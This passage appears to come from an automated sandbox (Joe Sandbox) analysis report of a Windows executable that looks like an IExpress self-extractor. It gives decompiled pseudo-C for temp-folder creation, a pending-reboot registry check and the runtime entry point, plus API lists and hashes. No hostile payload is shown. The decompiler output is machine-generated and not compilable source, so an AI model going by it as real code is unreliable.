                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A35802
                                                                          • Part of subcall function 00A32630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A32654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A35830
                                                                          • Part of subcall function 00A36517: FindResourceA.KERNEL32(00A30000,000007D6,00000005), ref: 00A3652A
                                                                          • Part of subcall function 00A36517: LoadResource.KERNEL32(00A30000,00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A36538
                                                                          • Part of subcall function 00A36517: DialogBoxIndirectParamA.USER32(00A30000,00000000,00000547,00A319E0,00000000), ref: 00A36557
                                                                          • Part of subcall function 00A36517: FreeResource.KERNEL32(00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A36560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A35878
                                                                          • Part of subcall function 00A3597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A359A8
                                                                          • Part of subcall function 00A3597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A359AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-1216675450
                                                                        • Opcode ID: df8669569eae9dc8d01150836c96ac1cce153d69e5693909aa952826a3c00338
                                                                        • Instruction ID: d3609c79da711cd796c18d6ceb65978f2621e96f49cdb8460db276d7e3f9a7a1
                                                                        • Opcode Fuzzy Hash: df8669569eae9dc8d01150836c96ac1cce153d69e5693909aa952826a3c00338
                                                                        • Instruction Fuzzy Hash: 17812970E04A14ABDB64EBB89D86BFF736D9F61300F040465F5C6E2190EFB48EC28A50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E00A353A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E00A3171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E00A31680(_t32, 0x104, _t20);
                                                                        					E00A3658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E00A36CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0xa38a20 = 1;
                                                                        				goto L5;
                                                                        			}

















                                                                        0x00a353ac
                                                                        0x00a353b3
                                                                        0x00a353b9
                                                                        0x00a353bb
                                                                        0x00a353bd
                                                                        0x00a353bf
                                                                        0x00a353d1
                                                                        0x00a353d6
                                                                        0x00a353e0
                                                                        0x00a353e2
                                                                        0x00a353f5
                                                                        0x00a353fb
                                                                        0x00a35402
                                                                        0x00a3540b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35413
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35415
                                                                        0x00a35416
                                                                        0x00a35427
                                                                        0x00a3542a
                                                                        0x00a3542b
                                                                        0x00a35434
                                                                        0x00a35434
                                                                        0x00a3543a
                                                                        0x00a3544c
                                                                        0x00a3544c
                                                                        0x00a35452
                                                                        0x00a3545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3545e
                                                                        0x00a3545f
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00A3171E: _vsnprintf.MSVCRT ref: 00A31750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A353FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1581276140
                                                                        • Opcode ID: 829c4849b303d395a10c231bd2f179db4a0621fcfc404c3847f43a1134e64008
                                                                        • Instruction ID: e488fbb0b42e655e8de2cbba8ed879e014fcc9fd1f9cfc460af8abd992d098d8
                                                                        • Opcode Fuzzy Hash: 829c4849b303d395a10c231bd2f179db4a0621fcfc404c3847f43a1134e64008
                                                                        • Instruction Fuzzy Hash: D7112371B0061477D328DB7A9D49FAF766EEFD2311F000125F686D2290CE74898386A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 a3256d-a3257d 520 a32583-a32589 519->520 521 a32622-a32627 call a324e0 519->521 523 a3258b 520->523 524 a325e8-a32607 RegOpenKeyExA 520->524 526 a32629-a3262f 521->526 525 a32591-a32595 523->525 523->526 527 a325e3-a325e6 524->527 528 a32609-a32620 RegQueryInfoKeyA 524->528 525->526 530 a3259b-a325ba RegOpenKeyExA 525->530 527->526 531 a325d1-a325dd RegCloseKey 528->531 530->527 532 a325bc-a325cb RegQueryValueExA 530->532 531->527 532->531
                                                                        C-Code - Quality: 86%
                                                                        			E00A3256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E00A324E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}











                                                                        0x00a32572
                                                                        0x00a32573
                                                                        0x00a32575
                                                                        0x00a32578
                                                                        0x00a3257d
                                                                        0x00a32627
                                                                        0x00a32583
                                                                        0x00a32586
                                                                        0x00a32589
                                                                        0x00a325eb
                                                                        0x00a32607
                                                                        0x00000000
                                                                        0x00a32609
                                                                        0x00a3261a
                                                                        0x00000000
                                                                        0x00a3261a
                                                                        0x00000000
                                                                        0x00a3258b
                                                                        0x00a3258b
                                                                        0x00a3259e
                                                                        0x00a325b2
                                                                        0x00a325ba
                                                                        0x00a325cb
                                                                        0x00a325d1
                                                                        0x00a325d6
                                                                        0x00a325da
                                                                        0x00a325dd
                                                                        0x00a325dd
                                                                        0x00a325e3
                                                                        0x00a325e3
                                                                        0x00a325e3
                                                                        0x00a3258b
                                                                        0x00a32589
                                                                        0x00a3262f
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00A34096,00A34096,?,00A31ED3,00000001,00000000,?,?,00A34137,?), ref: 00A325B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A34096,?,00A31ED3,00000001,00000000,?,?,00A34137,?,00A34096), ref: 00A325CB
                                                                        • RegCloseKey.KERNELBASE(?,?,00A31ED3,00000001,00000000,?,?,00A34137,?,00A34096), ref: 00A325DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00A34096,00A34096,?,00A31ED3,00000001,00000000,?,?,00A34137,?), ref: 00A325FF
                                                                        • RegQueryInfoKeyA.ADVAPI32 ref: 00A3261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A325F5
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00A325A8
                                                                        • PendingFileRenameOperations, xrefs: 00A325C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: fa09178a84afbcdf535db3ac06aa5258904f22fe1c2a6c456d6fa6b43ae2d832
                                                                        • Instruction ID: af2ad79cf4dcfc96db607766019b1d6f74ebdfe6d6b44e6c95861690e7126f04
                                                                        • Opcode Fuzzy Hash: fa09178a84afbcdf535db3ac06aa5258904f22fe1c2a6c456d6fa6b43ae2d832
                                                                        • Instruction Fuzzy Hash: BB118F35A02238BBAB24DB91AC09EFBBE7CEF127A1F104055B849A2000D7745F45D7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 533 a36a60-a36a91 call a37155 call a37208 GetStartupInfoW 539 a36a93-a36aa2 533->539 540 a36aa4-a36aa6 539->540 541 a36abc-a36abe 539->541 542 a36aa8-a36aad 540->542 543 a36aaf-a36aba Sleep 540->543 544 a36abf-a36ac5 541->544 542->544 543->539 545 a36ad1-a36ad7 544->545 546 a36ac7-a36acf _amsg_exit 544->546 548 a36b05 545->548 549 a36ad9-a36ae9 call a36c3f 545->549 547 a36b0b-a36b11 546->547 551 a36b13-a36b24 _initterm 547->551 552 a36b2e-a36b30 547->552 548->547 553 a36aee-a36af2 549->553 551->552 554 a36b32-a36b39 552->554 555 a36b3b-a36b42 552->555 553->547 556 a36af4-a36b00 553->556 554->555 557 a36b67-a36b71 555->557 558 a36b44-a36b51 call a37060 555->558 560 a36c39-a36c3e call a3724d 556->560 559 a36b74-a36b79 557->559 558->557 569 a36b53-a36b65 558->569 563 a36bc5-a36bc8 559->563 564 a36b7b-a36b7d 559->564 570 a36bd6-a36be3 _ismbblead 563->570 571 a36bca-a36bd3 563->571 567 a36b94-a36b98 564->567 568 a36b7f-a36b81 564->568 575 a36ba0-a36ba2 567->575 576 a36b9a-a36b9e 567->576 568->563 574 a36b83-a36b85 568->574 569->557 572 a36be5-a36be6 570->572 573 a36be9-a36bed 570->573 571->570 572->573 573->559 577 a36c1e-a36c25 573->577 574->567 578 a36b87-a36b8a 574->578 579 a36ba3-a36bbc call a32bfb 575->579 576->579 583 a36c32 577->583 584 a36c27-a36c2d _cexit 577->584 578->567 581 a36b8c-a36b92 578->581 579->577 586 a36bbe-a36bbf exit 579->586 581->574 583->560 584->583 586->563
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E00A37155();
                                                                        				_push(0x58);
                                                                        				_push(0xa372b8);
                                                                        				E00A37208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0xa388b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0xa388b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0xa381e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0xa388b0 = _t58;
                                                                        							_t37 = E00A36C3F(0xa310b8, 0xa310c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L00A36FF4();
                                                                        						L13:
                                                                        						_t68 =  *0xa388b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0xa310b4);
                                                                        							_push(0xa310ac);
                                                                        							L00A37202();
                                                                        							 *0xa388b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0xa388ac = 0;
                                                                        						}
                                                                        						_t71 =  *0xa388b4;
                                                                        						if( *0xa388b4 != 0 && E00A37060(_t71, 0xa388b4) != 0) {
                                                                        							_t60 =  *0xa388b4; // 0x0
                                                                        							 *0xa3a288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E00A32BFB(0xa30000, 0, _t59); // executed
                                                                        							 *0xa381e0 = _t30;
                                                                        							__eflags =  *0xa381f8;
                                                                        							if( *0xa381f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0xa381e4;
                                                                        							if( *0xa381e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0xa381e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E00A3724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}


















                                                                        0x00a36a60
                                                                        0x00a36a6a
                                                                        0x00a36a6c
                                                                        0x00a36a71
                                                                        0x00a36a78
                                                                        0x00a36a7f
                                                                        0x00a36a85
                                                                        0x00a36a8e
                                                                        0x00a36a91
                                                                        0x00a36a93
                                                                        0x00a36a9c
                                                                        0x00a36aa2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a36aa6
                                                                        0x00a36ab4
                                                                        0x00000000
                                                                        0x00a36aa8
                                                                        0x00a36aaa
                                                                        0x00a36aab
                                                                        0x00a36aab
                                                                        0x00a36abf
                                                                        0x00a36abf
                                                                        0x00a36ac5
                                                                        0x00a36ad1
                                                                        0x00a36ad7
                                                                        0x00a36b05
                                                                        0x00000000
                                                                        0x00a36ad9
                                                                        0x00a36ad9
                                                                        0x00a36ae9
                                                                        0x00a36af0
                                                                        0x00a36af2
                                                                        0x00000000
                                                                        0x00a36af4
                                                                        0x00a36af4
                                                                        0x00a36afb
                                                                        0x00a36afb
                                                                        0x00a36af2
                                                                        0x00a36ac7
                                                                        0x00a36ac7
                                                                        0x00a36ac9
                                                                        0x00a36b0b
                                                                        0x00a36b0b
                                                                        0x00a36b11
                                                                        0x00a36b13
                                                                        0x00a36b18
                                                                        0x00a36b1d
                                                                        0x00a36b24
                                                                        0x00a36b24
                                                                        0x00a36b30
                                                                        0x00a36b39
                                                                        0x00a36b39
                                                                        0x00a36b3b
                                                                        0x00a36b42
                                                                        0x00a36b57
                                                                        0x00a36b5f
                                                                        0x00a36b65
                                                                        0x00a36b65
                                                                        0x00a36b67
                                                                        0x00a36b6c
                                                                        0x00a36b6e
                                                                        0x00a36b71
                                                                        0x00a36b74
                                                                        0x00a36b74
                                                                        0x00a36b79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a36b7d
                                                                        0x00a36b81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a36b83
                                                                        0x00a36b8c
                                                                        0x00a36b8d
                                                                        0x00a36b90
                                                                        0x00a36b90
                                                                        0x00a36b83
                                                                        0x00a36b81
                                                                        0x00a36b94
                                                                        0x00a36b98
                                                                        0x00a36ba2
                                                                        0x00a36b9a
                                                                        0x00a36b9a
                                                                        0x00a36b9a
                                                                        0x00a36ba3
                                                                        0x00a36bab
                                                                        0x00a36bb0
                                                                        0x00a36bb5
                                                                        0x00a36bbc
                                                                        0x00a36bbf
                                                                        0x00000000
                                                                        0x00a36bbf
                                                                        0x00a36c1e
                                                                        0x00a36c25
                                                                        0x00a36c27
                                                                        0x00a36c2d
                                                                        0x00a36c2d
                                                                        0x00a36c32
                                                                        0x00000000
                                                                        0x00a36bc5
                                                                        0x00a36bc5
                                                                        0x00a36bc8
                                                                        0x00a36bcc
                                                                        0x00a36bce
                                                                        0x00a36bce
                                                                        0x00a36bd1
                                                                        0x00a36bd3
                                                                        0x00a36bd3
                                                                        0x00a36bd6
                                                                        0x00a36bda
                                                                        0x00a36be1
                                                                        0x00a36be3
                                                                        0x00a36be5
                                                                        0x00a36be5
                                                                        0x00a36be6
                                                                        0x00a36be6
                                                                        0x00a36be9
                                                                        0x00a36bea
                                                                        0x00a36bea
                                                                        0x00a36b74
                                                                        0x00a36c39
                                                                        0x00a36c3e
                                                                        0x00a36c3e
                                                                        0x00a36abe
                                                                        0x00a36abe
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00A37155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A37182
                                                                          • Part of subcall function 00A37155: GetCurrentProcessId.KERNEL32 ref: 00A37191
                                                                          • Part of subcall function 00A37155: GetCurrentThreadId.KERNEL32 ref: 00A3719A
                                                                          • Part of subcall function 00A37155: GetTickCount.KERNEL32 ref: 00A371A3
                                                                          • Part of subcall function 00A37155: QueryPerformanceCounter.KERNEL32(?), ref: 00A371B8
                                                                        • GetStartupInfoW.KERNEL32(?,00A372B8,00000058), ref: 00A36A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00A36AB4
                                                                        • _amsg_exit.MSVCRT ref: 00A36AC9
                                                                        • _initterm.MSVCRT ref: 00A36B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00A36B49
                                                                        • exit.KERNELBASE ref: 00A36BBF
                                                                        • _ismbblead.MSVCRT ref: 00A36BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 6803378bee397455c367cfd0296d334dd4e10f68b20f3fcd5a559d87a851b50c
                                                                        • Instruction ID: 4ba4553b13f192e1f8d401b115ac4227aef9f8b7a1d2e86a6965423b2691bd71
                                                                        • Opcode Fuzzy Hash: 6803378bee397455c367cfd0296d334dd4e10f68b20f3fcd5a559d87a851b50c
                                                                        • Instruction Fuzzy Hash: A141E271988324BBDB21DFA8DD057AAB7F4FB44760F24811AF841E7290CB7849428F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 a358c8-a358d5 588 a358d8-a358dd 587->588 588->588 589 a358df-a358f1 LocalAlloc 588->589 590 a358f3-a35901 call a344b9 589->590 591 a35919-a35959 call a31680 call a3658a CreateFileA LocalFree 589->591 594 a35906-a35910 call a36285 590->594 591->594 601 a3595b-a3596c CloseHandle GetFileAttributesA 591->601 600 a35912-a35918 594->600 601->594 602 a3596e-a35970 601->602 602->594 603 a35972-a3597b 602->603 603->600
                                                                        C-Code - Quality: 95%
                                                                        			E00A358C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E00A31680(_t20, _t36, _t33);
                                                                        					E00A3658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0xa39124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0xa39124 = E00A36285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}













                                                                        0x00a358cd
                                                                        0x00a358d1
                                                                        0x00a358d3
                                                                        0x00a358d5
                                                                        0x00a358d8
                                                                        0x00a358d8
                                                                        0x00a358da
                                                                        0x00a358db
                                                                        0x00a358e1
                                                                        0x00a358ed
                                                                        0x00a358f1
                                                                        0x00a3591e
                                                                        0x00a3592c
                                                                        0x00a35943
                                                                        0x00a3594a
                                                                        0x00a3594d
                                                                        0x00a35953
                                                                        0x00a35959
                                                                        0x00000000
                                                                        0x00a3595b
